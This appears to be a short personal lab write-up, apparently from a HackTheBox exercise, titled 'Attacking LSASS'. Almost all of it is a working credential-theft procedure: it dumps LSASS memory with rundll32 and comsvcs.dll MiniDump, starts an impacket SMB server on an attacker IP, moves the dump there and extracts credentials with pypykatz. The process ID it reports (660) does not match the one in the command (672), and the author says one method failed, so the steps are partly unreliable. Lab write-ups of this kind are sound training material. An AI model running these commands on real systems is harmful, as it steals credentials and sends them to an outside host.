Attacking LSASS

June 05, 2024

First we are getting the process id of lsass which is 660

Get-Process lsass

Then just create a lsass dump with this command

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

Now we will move the file from victim machine to attacker machine

First we have to open up a smb server. Create a directory where the file will be transferred

mkdir TmpShare
sudo impacket-smbserver -smb2support LsassData TmpShare
move lsass.dmp \\10.10.15.173\LsassData

Now move to the folder TmpShare

We can see here the file is now transferred with the same bytes

cd TmpShare
ls -la

ACTUALLY THE POWERSHELL CODE DOESNT WORK IT WITH ME

So i just use the task manager method

As we setup our listener or smbserver, we will get it 

sudo impacket-smbserver -smb2support LsassData TmpShare

Now move the DMP file to our attacker machine

move C:\Users\HTB-ST~1\AppData\Local\Temp\lsass.DMP \\10.10.15.173\LsassData

Now we got the DMP file

Just run the pypykatz which is mimikatz in linux written in python

pypykatz lsa minidump lsass.DMP
PreviousAttacking SAMNextAttacking Active Directory & NTDS.dit

Last updated